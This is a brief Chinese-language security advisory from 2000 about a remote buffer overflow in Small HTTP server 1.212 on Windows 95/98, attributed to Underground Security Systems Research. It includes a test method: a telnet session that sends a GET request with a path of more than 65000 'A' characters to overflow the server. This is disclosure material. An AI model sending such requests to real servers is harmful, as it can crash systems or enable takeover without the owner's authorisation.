发布日期：2000-06-19
更新日期：2000-06-19

受影响系统：

Max Feoktistov Small HTTP server 1.212
   - Microsoft Windows 98
   - Microsoft Windows 95

描述：

---

目前的Small HTTP版本中存在一个远程缓冲区溢出漏洞。当向webserver提交一个超
长的(大于65000字节)HTTP GET请求时，将使服务器发生缓冲区溢出。攻击者可能以
远程获取webserver运行时的权限。

<* 来源：Underground Security Systems Research (labs@ussrback.com)
         http://www.ussrback.com
*>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$ telnet example.com 80
Trying example.com...
Connected to example.com.
Escape character is '^]'.
GET /AAA...AAAA

这里"AAA...AAAA"的长度要大于65000.






建议：

---

暂无

浏览次数：6438
严重程度：0（网友投票）